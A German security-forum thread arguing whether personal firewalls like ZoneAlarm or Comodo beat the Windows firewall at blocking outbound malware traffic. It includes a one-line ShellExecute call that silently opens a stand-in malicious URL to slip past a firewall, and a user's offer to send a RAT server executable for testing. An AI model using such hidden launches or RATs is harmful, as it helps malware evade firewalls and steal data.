|
Bei Zonealarm ändern sich die Sicherheitseinstellungen der Öffentlichen Zone von alleine
(https://www.trojaner-board.de/130612-zonealarm-aendern-sicherheitseinstellungen-offentlichen-zone-alleine.html)
Bei Zonealarm ändern sich die Sicherheitseinstellungen der Öffentlichen Zone von alleine Liste der Anhänge anzeigen (Anzahl: 3) Hallo, Nach der Neuinstallation von Windows XP und der Installation der Zonealarm Extrem Security ändern sich die Einstellungen der Sicherheitszonen nach einem Neustart automatisch. Der Scan mit OTL zeigt u.a. an: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall] "DisableMonitoring" = 1 Code: OTL Extras logfile created on: 04.02.2013 13:50:01 - Run 3Danke. |
Hi again Warum bitte musst du ZoneAlarm nehmen? :wtf: So eine Software ist idR kontraproduktiv, belass es einfach bei der Windows-Firewall :) |
Ja, aber der komische Eintrag ist normal? Ich kann bei Windows XP auch auf die normale Firewall vertrauen? Ok.. ;)... Danke^^ |
Ja einfach Windows-Firewall verwenden. Wenn du ständig hinter einem Router bist wäre die noch nichtmal notwendig. |
Dort wird aber nur ISDN genutzt, das mit dem Router ist mir klar. Ok, man hat ja schon gehört, dass Firewalls nicht unbedingt notwenig in, sie verkaufen sich gut als Pseudoschutz. Ich nutze den Computer zudem auch nicht (mehr), dort macht mein Dad nur Onlinebanking :). Wobei ich sagen muss, als Laie lassen sich Programme wie Zonealarm besser bedienen, so kam es mir zumindest vor... Ich muss noch sagen, das Ändern der Rechte der Sicherheitszone fand bei meinem alten Computer nicht statt, es muss einen Grund geben, aber ich muss dem wirklich nicht nachgehen, dieser Computer wird von mir nicht genutzt. Aber ja, ich werde mir das zu Herzen nehmen und zukünftig der Windowsfirewall vertrauen und "nur" guten Viren- /Spywareschutz nutzen.. Wenn man einen Eindringling schnell erkennt, kann man ja handeln, sofern man von entsprechenden Tools weiß bzw weiß, wo man kompetente Hilfe bekommen kann, wie z.B. hier. |
Zitat:
Zitat:
Zwar schon twas älter, trifft aber das was ich meine => Personal Firewalls: Sinnvoll oder sinnfrei ? |
@Lydia33 Sind die ganzen AV Tools auf deinem Rechner aktiv??? Falls ja, würde ich mich für eins entscheien, und den Rest runterschmeissen. Falls dein Problem dann immer noch besteht, kannst du versuchen bei Zone Alarm den Passwortschutz zu aktivieren. Hast du eines der AV Tools mit einen Crack aktiviert? Zitat:
Ich habe eben auf einem Rechner 3 verschiedene Tests mit Windows 7 und aktivierter Firewall gemacht. 1. Einen harmlosen Leaktest über Port 80 -> fail 2. Einen ungecrypteten RAT, ca. 3 Jahre alt, public -> fail 3. Einen ungecrypteten Stealer, ca. 6 Monate, public -> fail Ich habe alle Verbindungen mit Netstat geprüft, alle 3 Tools funktionieren einwandfrei. In keinem der 3 Fälle hatte die Windows 7 Firewall etwas dagegen, sie blieb still. Ein vierter Test mit einem harmlosen selbsgecodeten Tool ergab das selbe. Die Firewall kann aber nicht wissen, dass das Tool harmlos ist, es ist ein Accountchecker, und sendet Accounts zur Überprüfung ins Internet an einen Server, ähnlich wie es ein Stealer macht. Mit der Gratis Firewall von Comodo ist es nicht einmal möglich, eines der 3 Tools zu starten. Es wird sofort geblockt. Auch andere Firewalls wie die von Emsisoft, Agnitum Outpost, Zone Alarm oder im Falle dass es sich um gecryptete Server handelt die Kaspersky, Bitdefender oder GData nicht als virus erkennen, verhindert wenigstens deren Firewall das "Nach Hause Telefonieren". Die Windows Firewall bietet bei diesen rausgehenden Verbindungen also keinerlei Schutz. Wenn der Trojaner jetzt noch gecryptet wurde, so dass kein AV ihn kennt, hat man schlechte Karten. Das kleine Tool aus Test 1 kannst du dir hier runterladen: hxxp://www.grc.com/lt/leaktest.htm Auf Wunsch, falls du mir nicht glaubst, kann ich dir auch noch eine Server.exe schicken, die allerdings Malware ist. Ich kann sie aber so einstellen, dass dein Virtuelles System keinen Schaden nimmt. Du kannst das aber auch selber machen, indem du dir ein RAT besorgst, und den Server selber erstellst. Das ist aber nicht ungefählich, da sowas oft backdoored ist, also Vorsicht. Mach das IMMER NUR in der VM oder Sandbox oder beides. Du siehst, meine Philosophie ist ganz anders als deine. Ich benötige im Grunde gar kein AV Tool, nur eine bissige Firewall. Denn ich habe gelernt, dass es kein AV Tool gibt, das einen relativ frischen Schädling erkennt. Somit ist ein AV Tool für mich quasi sinnlos. Ich verwende sie nur zum Aufräumen, um die VM für meinen nächten Test sauber zu haben. Danke fürs Lesen. :abklatsch: |
Zitat:
Zitat:
Sie soll nicht RAT und Stealer erkennen sondern je nach Regelwerk bestimmte Kommunikation erlauben bzw. unterbinden! Da fragt man sich doch auch warum denn dein Virenscanner diese alte Malware nicht erkannt hat! Zitat:
Wie bitte kann ein Paketfilter bzw. eine Firewall denn zuverlässig ausgehenden Verkehr überwachen v.a. wenn das System schon kompromittiert ist? Garnicht. Zitat:
|
Zitat:
Zitat:
Auf der VM läuft kein AV Tool aktiv mit. Wie sonst sollte ich denn dort solche Tests machen? Zitat:
Edit: Warum reagiert die Windows 7 Firewall bei dem Leaktest nicht? Wäre das nicht genau ihre Aufgabe? |
Zitat:
In den Standardsettings schirmt die WinFirewall alle Dienst nach außen hin ab. Zitat:
Zitat:
Das ist ein ziemlicher Unterschied. Wenn das eine richtige fiese Zecke gewesen wär, wär vllt schon einiges im System umgebaut und Comodo gar deaktiviert/abgeschossen worden. Naja, kommt auch ein wenig auf die Rechte an, mit den die Malware ausgeführt wurde, aber das ist dir wohl klar :) Zitat:
Zitat:
Wieso denn Port 80, wer hat denn standardmäßig einen Webserver unter Windows laufen? :confused: Und eigentlich sollte die Windows-Firewall Port 80 eingehend standardmäßig filtern. |
Zitat:
Zitat:
Zitat:
hxxp://www.grc.com/lt/leaktest.htm Dort findest du eine Beschreibung zum Test. Für mich sieht es so aus, dass wenn man als Admin angemeldet ist, die Windows Firewall durch den Test penetriert wird. Probier es bitte mal aus, mit Win 7 oder Vista. |
Danke für den Link. Aber iwie ist da nur die Rede von der Windows-Firewall von WinXP? :wtf: |
Zitat:
|
Ich teste es nachher mal in einer VM oder so. |
Zitat:
Falls Interesse besteht sind hier noch weitere Firewall Tests: Firehole 1.01 hxxp://keir.net/firehole.html PCFlank Leaktest hxxp://www.pcflank.com/ Atelier Web Firewalltester 5 hxxp://www.atelierweb.com/products/firewall-tester/ Ich befürchte, die Windows Firewall wird keinen bestehen. :pfeiff: |
So, ich hab jetzt fleißig rumgespielt. Es geht dir zwar um ausgehende Verbindungen aber egal. Da gab es früher schon Wege um auch andere PFWs, die ja angeblich so sicher auch ausgehende Verbindungen überwachen können zu überwinden. :rolleyes: Zitat:
Führt man dann die leaktest.exe aus, kann sie nichts penetrieren wie sie so schön sagt :) siehe => http://saved.im/mtg5mjq5d2fy/auswahl_004.png Allerdings darf man sie nicht mit Adminrechten ausführen, mit Adminrechten schafft sie es. Ist ja auch irgendwie logisch. Ein Schädling mit Adminrechten kann theoretisch auch alles überwinden. So und nun? Was lernen wir daraus? Soll jetzt die Windows-Firewall jedes Programm ausgehend blockieren was nicht eplizit erlaubt ist? Oder soll eine unsinnige PFW jedes mal nachfragen wenn das kleinste Popelprogramm mal wieder nach Updates sucht? Beachte, wenn Programme im Kontext eines Admins laufen hast du ganz schlechte Karten mit einer Firewall, die auf dem zu überwachenden System selbst läuft. Zitat:
Mal ne Frage, kann dein tolles COMODO sowas blockieren? :) Code: ShellExecute(NULL, "open","http://www.poehseseite.com/XXX.php", NULL,NULL, SW_HIDE);Mal sehen was du dazu sagst. |
Noch was: Man kann auch die Firewall so einstellen, dass standardmäßig nicht nur die ein- sondern auch die ausgehenden Verbindungen blockiert werden. Dann kann wirklich nur das nach außen kommunizieren können was auch explizit erlaubt ist. Leaktest ging dann nicht mehr, auch mit Adminrechten nicht. Selbst mit dem IE konnte ich nicht mehr surfen. Hab dann eine Ausnahme für den Firefox gemacht, nur der konnte dann noch mit dem Netz kommunizieren :) Siehe auch Firewall in Windows 7 optimal einstellen | com! - Das Computer-Magazin http://www.com-magazin.de/uploads/tx.../profil_02.jpg Zitat:
|
Zitat:
Zitat:
Zitat:
Zitat:
Wenigstens Blockt die Comodo Firewall ausgehenden Verkehr für Programme die keine Regeln haben, ohne das man vorher was einstellen muß. Zitat:
Zitat:
Zitat:
Nur leider hast du das dem User, dem du die Windows Firewall quasi aufgedrängt hast, nicht gesagt, dass sie ohne die nötigen Einstellungen absolut keinen Schutz für ausgehenden Verkehr bietet. Hast du das einfach nur im Stress vergessen? Du hast ihm schließlich ausdrücklich gesagt, sie sei sicher, und dass er sie nichtmal bräuchte, wenn er hinter einen Router sitzt. Lernt man das so im Kompetenzteam? :lach: Also, was war jetzt falsch? Dem User die Firewall von Windows zu empfehlen und ihm eine viel bessere auszureden, oder dass du vergessen hast ihm zu sagen, dass er sie erst noch "richtig" einstellen muß? Du hast die Windows Firewall empfohlen, ohne über sie bescheid zu wissen, das geht ja klar aus deinen Posts hervor. Besonders deine letzten beiden Posts zeugen von wenig Kompetenz, dafür aber von viel Ego. Weil nicht sein kann, was nicht sein darf. Du hast diese Firewall schließlich immer empfohlen, also muß sie gut sein.:lach: hxxp://www.tecchannel.de/sicherheit/spam/2030120/schutz_vor_angriffen_ratgeber_personal_firewalls_fuer_windows_7/index3.html |
Zitat:
Zitat:
Zitat:
Wenn man sie mal konfigurieren täte, könnte die WinFirewall auch alles ausgehende bis auf das Erlaubte blocken, aber wer ständig OUTBOUND Traffic überwachen/kontrollieren will leidet an etwas anderes und traut auch seiner Kiste hinten und vorne nicht mehr. :balla: Du brauchst nur die Windows-Firewall zum Abschotten der Dienste. Sobald du auch nur eine Regel hast, die ausgehenden Verkehr erlaubt ist das Konzept schon fast hinfällig. Siehe default Browser. Egal ob deine heiß geliebte COMODO Software, Windows-Firewall mit erweiteren Einstellungen oder sonstwas. Dafür hat die WinFirewall einen entscheidenden Vorteil: sie ist so oder so im Betriebssystem von Windows integriert ob du willst oder nicht, Updates direkt vom Hersteller über Windows-Update. Aber Systeme nicht unnötig komplexer zu machen, lernst du vllt im nächsten Kapitel nachdem du mal ein paar Grundlagen vorher gelesen und auch verstanden hast :daumenhoc Zitat:
Weil deine COMODO das ja auch nicht unterbinden kann! :D Zitat:
Zitat:
Zitat:
Aber setzt ruhig mal nur auf dein straffes Regelwerk deines Spielzeugs, das allein reicht ja, kann dir ja nichts mehr passieren :abklatsch: Zitat:
Sry aber mit deinem Posting hast du dich jetzt echt vergriffen, deine primitiven Versuche, das Kompetenzteam zu diffamieren sind einfach nur armselig. Für eine sichere Konfig reicht es immer aus, eingehende Verbindungen zu blockieren bzw. keine Dienste nach außen hin anzubieten. Wenn irgendwas ausgehend schlimmes passiert liegt der Fehler schon irgendwo davor und da kann dich in einem Ernstfall weder die Windows-Firewall noch irgendein anderes Spielzeug wie dein heiß geliebtes COMODO davor bewahren :) Aber wie gesagt, das lernst du nachdem du dir mal ein paar Grundlagen angeeignet hast und dieses peinliche Marketinggeblubber ablegst :daumenhoc |
Nur noch peinlich, was du von dir gibst. :nono: Zitierst ein paar Schnipsel aus meinem Post, und spielst dich hier als Kompetenzteammember auf. :lach: Nur hierzu hast du gar nichts gesagt. Warum wohl? :lach: Übersehen? Ich habs für dich mal größer gemacht. :lach: Nur leider hast du das dem User, dem du die Windows Firewall quasi aufgedrängt hast, nicht gesagt, dass sie ohne die nötigen Einstellungen absolut keinen Schutz für ausgehenden Verkehr bietet. Hast du das einfach nur im Stress vergessen? Du hast ihm schließlich ausdrücklich gesagt, sie sei sicher, und dass er sie nichtmal bräuchte, wenn er hinter einen Router sitzt. Also, was war jetzt falsch? Dem User die Firewall von Windows zu empfehlen und ihm eine viel bessere auszureden, oder dass du vergessen hast ihm zu sagen, dass er sie erst noch "richtig" einstellen muß? Antworte mal hier drauf. *Nicht wundern, wenn deine grandiosen Tipps demnächst in einem anderen Forum auftauchen. Es ist nur fair wenn andere auch an deinem Fachwissen teilhaben dürfen. You made my Day. |
Zitat:
Und nochmal zum Mitmeißeln: Die Standardsettings der Windows-Firewall sind sicher, von außen (WAN) gibt es keine Möglichkeit auf einen Dienst des Win7-Rechners zuzugreifen. Zitat:
|
Immer noch ungeklärte Punkte, wo ich von dir Firewallprofi keine Stellungnahme zu bekommen hab außer vllt "was soll ich dazu sagen" :D
Zitat:
|
Nur leider hast du das dem User, dem du die Windows Firewall quasi aufgedrängt hast, nicht gesagt, dass sie ohne die nötigen Einstellungen absolut keinen Schutz für ausgehenden Verkehr bietet. Hast du das einfach nur im Stress vergessen? Du hast ihm schließlich ausdrücklich gesagt, sie sei sicher, und dass er sie nichtmal bräuchte, wenn er hinter einen Router sitzt. Also, was war jetzt falsch? Dem User die Firewall von Windows zu empfehlen und ihm eine viel bessere auszureden, oder dass du vergessen hast ihm zu sagen, dass er sie erst noch "richtig" einstellen muß? |
Bitte hör auf zu schreien, du bist hier nicht zuhause. Ich glaube du missverstehst (u.a.) den Forengegenstand. Es geht hier darum, wie kann ein normaler, rechtschaffener normaler Computerbenutzer sich und seinen PC möglichst effektiv vor Computermalware schützen. Es geht nicht darum, wie ein Computerkiddy scheinbar effektiv und unerkannt illegale Software nutzen, verbreiten und herunterladen oder "anonym" in Foren u.ä. seine Meinungen und Ansichten verbreiten kann etc. Ich habe schwer den Eindruck, dass dies aber dein Fokus ist. Da bist du hier aber falsch und es ist ein unpraktikabler und falscher Ansatz um einen PC vor Malware zu schützen. |
Zitat:
Statt Argumentation, Stellungnahme zu ungeklärten Punkten wiederholt man sich lieber und damit's anders aussieht variiert man die Textformatierung :lach: |
Die gesamte Diskussion verläuft ohnehin im Sande, wenn man die Ausgangssituation betrachtet. Warum denn den Feind ins Haus lassen, um ihn dann einzusperren und den Kontakt nach Außen zu verbieten. Shadow hat es schon angedeutet. Sinn und Zweck sollte es sein, die Malware gar nicht erst ins System zu lassen, dann braucht man sich folglich auch keiner Sorgen machen, was sie machen könnte, wenn sie im System ist. Andersherum ist es ein falscher Denkansatz. Auch wenn das Argument stimmen mag, dass eine Firewall einen dann vor schlimmeren bewahren könnte, wenn doch mal ein Schädling auf dem Rechner landet, birgt dieser Ansatz dennoch einige Gefahren. Viele Nutzer neigen dazu sich dann sicher zu fühlen, was sie mit einer Firewall aber nicht unbedingt sind, da es für Malware Möglichkeiten gibt, diese zu umgehen. Zudem ist es, wie Cosinus bereits erwähnt hat, nicht so einfach eine Firewall richtig zu bedienen, wenn man nicht schon etwas mehr Erfahrung mit Computern hat. MfG, Kaos |
Zitat:
Zitat:
Wer so eine Panik hat, will mit einer PFW nur sein Gewissen beruhigen. :) |
zumal malware eh über code injektion arbeitet und so den traffic evtl. über schon erlaubte Programme sendet, firefox, iexplore, what ever. Comodo mag ein gutes Programm sein, obwohl ich das Verhalten von dieser firma sehr merkwürdig finde... Comodo agrees to pay $50,000 to AV-Comparatives.org for test auditing & validation | MELIH ABDULHAYOGLU - Internet Security and Trust da möchte man einem unabhängigem tester geld bezahlen... das ist schon mal ein wenig merkwürdig, aber egal. aber man kann es eben auch nur bedienen, wenn man fachwissen mitbringt, so ist die Verhaltensanalyse nicht mal in der Lage, rootkits wie Zero access in der Standard konfiguration zu blockieren, obwohl meldungen angezeigt werden. außerdem, wofür brauchen private Nutzer schon eine Firewall, die sind doch höchstens mal nem Portscan ausgesetzt und das ist nichts gefährliches. Wenn man mal guckt, was pfw's so anzeigen, ist das doch meist nur blödsinn für jeden kleinen mumpitz, um dem Nutzer eine Scheinsicherheit vorzugaukeln, aber die waren Probleme werden nicht angegangen, arbeiten als Admin, klaffene Sicherheitslücken usw. Wenn man dann häufig das Argument liest, aber ich muss doch wissen welches Programm nach hause telefoniert, frage ich mich, warum instaliert man sich Programme, den man nicht vertraut? und, wer gibt einem die Garantie, das die Desktop Firewall tatsächlich alles blockt? edit: Überschneidungen mit Arne waren nicht beabsichtigt. :-) |
Zitat:
Zitat:
:blabla: |
Hi, ja, obwohl ich eh das Gefühl habe, Heise macht aus den Router News einen Hype, vorher hat sich doch auch keiner interessiert, ob sein Router die aktuellste Firmware hatt, is ja wie beim Windows System. Es ist aber schon ein Trauerspiel, dass man Hersteller durch veröffendlichung von Problemen dazu zwingen muss, Updates rauszubringen. Edit: war jetzt nicht unbedingt bezogen auf Grundgütiger. nur meine 2Pfennig zur Software Firewall. Bei Hardware Firewalls mag das, evtl. anders aussehen, da die vom eigendlichem System getrennt ist, aber da kann ich aufgrund mangelner Kenntniss nicht mitreden. |
Egal ob Firmware aktuell oder nicht aktuell, ich stell meine Router so ein, dass die nichts nach außen anbieten, oder zumindest nur sowenig wie möglich. Beispiel: Internet-Webinterface des Routers nicht von allen IP-Adressen erreichbar, Standardport auf irgendwas $random wie zB hxxps://cosinusrouter.example.local:56723 und das darf auch nur zB 87.0.0.0/8 Aber es ist eine Farce, es wird überall verlangt dass Computer und das Internet einfacher werden müssen, seitdem die Masse richtig schnelles Internet hat sind zumindest für mich gefühlt die Sicherheitslücken und Probleme extrem in die Höhe geschossen...es fängt schon damit an, dass ja alles zu komliziert wird weil man ja nur eingeschränkte Rechte unter Windows verwendet, alles zu umständlich blablblubb usw. aber man erkauft sich den Komfort indem man mit Sicherheit bezahlt und beim nächsten falschen Klick unter Windows all seine lokalen verschlüsselt vorfindet und keiner aus der Virenscannerbranche auf das Thema Backup vorher hingewiesen hat :stirn: |
Hi, das glaube ich persönlich nicht. Die Leute sind genauso unbedarft / faul oder, denke ich, unwissend wie früher, nur Sicherheitslücken werden heut zu Tage schneller ausgenutzt. Schau dir z.B. Blackhole an, da gab es dieses Jahr und im letzten Jahr 2 Fälle, wo aktuelle Lücken genutzt wurden, die nicht geschlossen waren. Das ist ein zweiter Punkt, Malware ist ein "Massenmarkt" geworden, jeder, der bereit ist, ein wenig Geld zu investieren, kann sich einen Baukasten kaufen, jeder der ein wenig mehr hatt, auch was professionelleres. Ein weiteres Problem aus meiner sicht ist, dass die verwendung von Schadsoftware sich geendert hatt, schaut man mal den Anfang an, waren die ersten vieren einfach dinge, die aus Spaß erstellt wurden, heute ziehlt man auf Geld ab, in diesem Bereich werden milliarden umgesetzt, und es gibt Strukturen, wie in richtigen Firmen, einer schreibt die Programme, andere schreiben zb angepasste Spamtexte, webinjekts für banking Pages, andere lösen das Geld ein, was man den "Opfern" abgenommen hatt. Es muss also ein Umdenken statt finden, denn nicht nur die kriminelle Szene hat sich weiter entwickelt, auch PC's werden immer mehr zum persönlihcem Lebensbereich. während man sein Tagebuch aber nicht ins Treppenhaus legen würde, offen für Jedermann, hat diese Einsicht bei PC's noch keinen Einzug gehalten. Und, nein, kein Argument für Desktop Firewalls :-) Um noch mal auf die Lücken in den Firmwares zurückzukommen. Hier ists wie bei Windows Programmen, hätten die Router schon mal vernünftige Updater, währen die Probleme bei Einigen wesendlich geringer. Würden die Hersteller auf gemeldete Bugs reagieren, ohne das man erst in die Öffendlichkeit gehen müsste, währe das ganze wesendlich undramatischer. Natürlich währen einige Lücken auch dann nicht ausnutzbar, wenn die Leute andere Passwörter vergeben würden. Das ist ja genau wie bei Java, schaut man mal, dass das Programm einen internen Updater hatt, müsste man denken, dass sollte klappen, wenn man in den Logs guckt, hat kaum einer die aktuelle Version instaliert. Hier muss man z.B. Microsoft mal ein Lob, aus meiner sicht, aussprechen, denn mit Windows 7 sind ei meisten PC's relativ aktuell gehalten. |
Jetzt wird die Diskussion besser :) Warte ich schreib noch gleich was dazu |
Darf ich mir wenigstens n bier hohlen? |
Ausnahmsweise :blabla: |
is eh zu spät.... |
| Alle Zeitangaben in WEZ +1. Es ist jetzt 12:32 Uhr. |
Copyright ©2000-2025, Trojaner-Board